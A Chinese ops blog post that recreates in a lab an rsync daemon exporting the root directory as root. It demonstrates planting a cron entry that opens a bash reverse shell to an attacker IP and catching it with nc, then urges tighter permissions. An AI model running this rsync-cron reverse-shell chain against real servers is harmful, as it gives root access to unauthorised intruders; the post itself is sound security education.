攻击你,与你何干!rsync你还敢这么玩?

最新推荐文章于 2024-01-31 15:02:30 发布
最新推荐文章于 2024-01-31 15:02:30 发布
阅读量352 收藏
点赞数
分类专栏: 安全 运维工程师 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lu_tixia/article/details/126592772
版权

rsync同步服务反弹shell

rsync服务/命令在企业中运用非常广泛,主要是轻量、便捷、高效。在数据同步中,不管是做服务还是命令使用,都非常方便、快速。

但是在日常运维中,往往会发现很多开发或者运维人员,一味的图简单,把一些老生常谈的安全注意事项抛之脑后,最终酿成大祸!

下面说说之前做服务器安全评估遇到的真事。某业务线的运维同事因为需要经常在多台服务器之间同步文件,而且是不同项目文件。为了偷懒,不想多写同步模块,所以他在编辑配置文件时,直接将/目录发布出去了。最后被我们研发中心扫描出来,季度绩效也因此评为C。

有小伙伴可能会疑惑,这会有什么风险呢?下面我在实验环境还原一下他当时的环境,以及可能会遇到的风险。

配置同步服务器(被攻击服务器)

# 安装rsync:
~]# yum install rsync -y
# 编辑配置文件:
~]# cat /etc/rsyncd.conf 
 uid = root
 gid = root
 use chroot = yes
 max connections = 4
 pid file = /var/run/rsyncd.pid
 exclude = lost+found/
 transfer logging = yes
 timeout = 900
 ignore nonreadable = yes
 dont compress   = *.gz *.tgz *.zip *.z *.Z *.rpm *.deb *.bz2
read only = false

[ftp]
        # 这点是重点,要发布的同步目录
        path = /
        comment = ftp export area

# 启动rsyncd服务:
~]# systemctl start rsyncd
这个配置文件有两个危险指令,一个是 uidgidroot,他设置为 root是为了同步文件方便,不需要考虑文件权限问题;二是开放根目录,这两个配置直接会导致后面的问题!

配置攻击服务器

rsync服务器默认是监听873端口,通过nmap工具可以很方便扫描到,这里不再演示。

# 查看同步服务器开放的同步模块,下面可以看到开放了`ftp`模块
~]# rsync rsync://192.168.75.121
ftp             ftp export area

# 具体看下ftp模块中提供了那些目录文件。下面可以看到整个根都发布出来了!
~]# rsync rsync://192.168.75.121/ftp
dr-xr-xr-x            247 2022/08/16 16:45:37 .
lrwxrwxrwx              7 2021/10/13 14:00:20 bin
lrwxrwxrwx              7 2021/10/13 14:00:20 lib
lrwxrwxrwx              9 2021/10/13 14:00:20 lib64
lrwxrwxrwx              8 2021/10/13 14:00:20 sbin
dr-xr-xr-x          4,096 2021/10/13 14:05:43 boot
drwxr-xr-x             17 2022/08/16 16:45:37 data
drwxr-xr-x          3,300 2022/08/15 15:03:13 dev
drwxr-xr-x          8,192 2022/08/16 17:31:47 etc
drwxr-xr-x             18 2022/08/16 15:16:45 home
drwxr-xr-x              6 2018/04/11 12:59:55 media
drwxr-xr-x              6 2018/04/11 12:59:55 mnt
drwxr-xr-x             78 2022/08/15 15:38:54 opt
dr-xr-xr-x              0 2022/08/15 15:03:05 proc
dr-xr-x---            233 2022/08/16 17:19:47 root
drwxr-xr-x            860 2022/08/16 17:31:47 run
drwxr-xr-x              6 2018/04/11 12:59:55 srv
dr-xr-xr-x              0 2022/08/15 15:03:10 sys
drwxrwxrwt          4,096 2022/08/16 17:36:21 tmp
drwxr-xr-x            155 2021/10/13 14:00:20 usr
drwxr-xr-x            267 2021/10/13 14:02:35 var
drwx------             19 2022/08/16 14:28:46 www

配置反弹shell

反弹shell在之前的文章中详细讲到过,这里不再赘述。因为rsync同步服务器直接把根发布出来了,所以比之前通过redis服务攻击更加简单了。只需创建一个root的计划任务文件,然后同步过去即可。

# 创建root计划任务文件
~]# cat > root <<EOF                                       
* * * * * bash -i &>/dev/tcp/192.168.75.123/8888 0>&1
> EOF

# 同步到被攻击服务器,放置到计划任务目录:
~]# rsync -av root rsync://192.168.75.121/ftp/var/spool/cron/

# 安装nc工具:
yum  install nmap -y
# 设置监听端口,等待被攻击服务器连接即可:
~]# nc -lvnp 8888
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 192.168.75.121.
Ncat: Connection from 192.168.75.121:36320.
bash: no job control in this shell
# 可以看到已经顺利拿到被攻击服务器的shell了!
[root@192-168-75-121 ~]# exit

没出事之前,觉得危险离自己很远,出事之后,才会发现危险就在身边。老生常谈的安全问题一定要注意,切不可一味的贪图简单,而放大文件、服务器的权限。

你要是喜欢这篇文章的话,帮忙点赞呀,你的喜欢就是我原创的动力!关注我的公众号(运维朱工)获取最近更新!

运维朱工
关注
专栏目录
后台运行rsync命令的解决方案
weixin_43178406的博客
09-28 5万+
本文主要介绍了后台运行rsync命令的解决方案,希望能对使用Linux的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
rsync 未授权访问漏洞
weixin_59086772的博客
12-28 7483
雨笋教育小编来分享干货了,感兴趣的可以一同探讨。 0x00前言 rsyncLinux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 0x01漏洞原理 rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 0x02漏洞危害 rsync未授权访问会造成严重的信息泄露,攻击者可以上传脚本后门文件,远程命令执行。 0x03环境搭建 docker-compose.yml version: '2' s
phpinfo函数_文件包含之通过phpinfo去Getshell
weixin_39528994的博客
12-04 1853
1.phpinfo信息利用phpinfo文件泄露一直被大家所忽视,但其实phpinfo可以为攻击渗透测试人员提供很多的信息。1.system提供服务器所在的操作系统的信息。2.真实ip知道真实ip的我们可以省去cdn带来的各种困扰。我们同时也可以端口旁站一顿操作。3.web根目录网站绝对路径对渗透测试相当的有用,当你找到SQL注入点时,要上传木马的时候就需要知道网站的绝对路径才可以获取w...
每日漏洞 | rsync未授权访问
03-12 3885
每日漏洞 | rsync未授权访问
rsync、sersync安装配置
qq_51010919的博客
07-20 1287
Sersync通常与rsync(一种用于文件同步和传输的工具)配合使用,以便在不同的服务器或文件系统之间高效地传输文件。**是需要自己在数据源服务器上新建的,这是需要同步到远程设备服务器上的目录。综上,sync命令通过将文件系统的缓存数据写入磁盘来保证数据的一致性和持久性,在必要时可以手动调用该命令。非独立的服务:非独立的服务需要依赖其他的服务来管理,rsync就是一个非独立的服务,依赖xinetd来管理。sync命令在Linux系统中用于将内存中的脏数据写入磁盘,以确保数据同步到磁盘中。
应用协议漏洞-Rsync+协议+漏洞批扫
xiaoheizi的博客
07-12 664
msfconsole是一个强大的接口程序。rsync rsync://123.58.224.8:20700/src/etc/crontab /root/cc.txt 查看crontab中的内容,发现有一个每17分钟执行一次/etc/cron.hourly文件的定时任务。命令:rsync -av shell rsync://123.58.224.8:22700/src/etc/cron.hourly。漏洞存在,可以读取文件:rsync rsync://123.58.224.8:58725/src/tmp/
测试rsync未授权访问漏洞及批量检测
最新发布
m0_53073183的博客
01-31 878
rsyncLinux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件 传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配 置 ACL 或访问密码,我们将可以读写目标服务器文件。
rsync
01-20
通过以上介绍,我们可以看到`rsync`是一个强大且灵活的工具,不仅可以用于定期备份,还可以实现文件的实时同步,适用于各种复杂的IT环境。了解并熟练掌握`rsync`的使用,对于系统管理员来说是非常有价值的技能。
docksync:Rsync 文件从你的 macosx 机器到 docker 容器
07-03
同步 将文件从 macosx 机器同步到 docker 容器的工具。 从 macosx 到 docker 主机再到容器共享卷非常慢。 在我们的一个大型应用程序中,通常... 这仅适用于 ubuntu,因为它使用 apt-get 将 rsync 服务器安装到正在
rsync rpm安装包
09-07
rsync rpm安装包
Rsync漏洞 && Redis漏洞
CN_SHzhaoyujie的博客
12-04 1550
Rsync漏洞 && Redis漏洞 Rsync配置不当 Rsync(remote synchronize)是一款实现远程同步功能的软件。它在同步文件时可以保持原来文件的权限,时间,软硬链接等附加信息。rsync默认同步是不加密,可使用ssh隧道方式进行加密同步。端口默认873,和其他软件搭配使用 rsync + crontab rsync + sersync 使用ssh隧道方式进...
敏感端口上的常见攻击方式
热门推荐
Shanfenglan's blog
08-23 27万+
端口 协议/服务 攻击技巧 21/22/69 ftp/tftp:文件传输协议 爆破嗅探溢出;后门 22 ssh:远程连接 爆破OpenSSH;28个退格 23 telnet:远程连接 爆破嗅探 25 smtp:邮件服务 邮件伪造 53 DNS:域名系统 DNS区域传输DNS劫持DNS缓存投毒DNS欺骗深度利用:利用DNS隧道技术刺透防火墙 67/68 dhcp 劫持欺骗 110 pop3 爆破 139 samba 爆破未授权访问远程代码执行 143 imap ...
Linux安全之三大攻击(SYN,DDOS,CC)原理及处理
三口酥屋
04-11 4325
Linux安全之SYN攻击原理及处理TCP自从1974年被发明出来之后,历经30多年发展,目前成为最重要的互联网基础协议,但TCP协议中也存在一些缺陷。SYN攻击就是利用TCP协议的缺陷,来导致系统服务停止正常的响应。SYN攻击原理TCP在传递数据前需要经过三次握手,SYN攻击的原理就是向服务器发送SYN数据包,并伪造源IP地址。服务器在收到SYN数据包时,会将连接加入backlog队列,并向源I...
rsync的几则tips(渗透技巧)
Coisini的博客
06-21 1186
关于rsync rsync(remote synchronize)——Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。 rsync默认配置文件为/etc/rsyncd.c...
Rsync匿名访问漏洞
weixin_30708329的博客
04-25 729
前言 前两天总结了互联网或者说IT公司内网常见的漏洞,然后决定针对还没学习过不了解的漏洞进行学习了解,所以准备一一针对来研习,今天是第一篇,立一个Flag,争取今年搞定,为啥说的这么艰难,因为平时工作忙,不一定每周都有时间研究,说一下,常见的WEB类漏洞,弱口令漏洞就不在赘述了,不算在此次学习之列 Rsync简介 什么是Rsync Rsync(remote synchronize)是一...
rsync安装、配置、实例
******* ▄︻┻┳═一 *******
08-17 1206
rsync命令是一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件。rsync使用所谓的“rsync算法”来使本地和远程两个主机之间的文件达到同步,这个算法只传送两个文件的不同部分,而不是每次都整份传送,因此速度相当快。 rsync是一个功能非常强大的工具,其命令也有很多功能特色选项,我们下面就对它的选项一一进行分析说明。 一、语法 rsync [OPTION]... ...
grep命令详解
笨办法学linux的博客
10-06 9858
用于过滤/搜索的特定字符。可使用正则表达式能配合多种命令使用,使用上十分灵活。
2021年,运维工程师笔试真题(一)(附带答案)
笨办法学linux的博客
07-13 8277
1、在Linux系统的vim编辑器中,如果不保存对文件进行的修改,应使用( )命令强制退出vi编辑器? A、:q B、:wq C、:q! D、:!q 2、linux的系统调用是指()? A、由内核发起的调用 B、glibc函数库里的函数 C、由系统管理员运行的程序 D、是用户进程调用内核功能的接口 3、以下命令可以用于获取本机cpu使用率的是()? A、ifconfig B、uptime C、top D、netstat 4、Linux文件权限一共10位长度,分成四段,第三段表示的内容是_()? A、文
openrsyncrsync 有什么区别?
10-10
openrsyncrsync 的开源实现,它与 rsync 在文件同步和备份功能上有很多相似之处,但也存在一些区别。 主要区别如下: 1. 许可证不同:openrsync 使用 GPL 许可证,而 rsync 使用自由软件许可证。 2. 开发状态:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

运维朱工

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值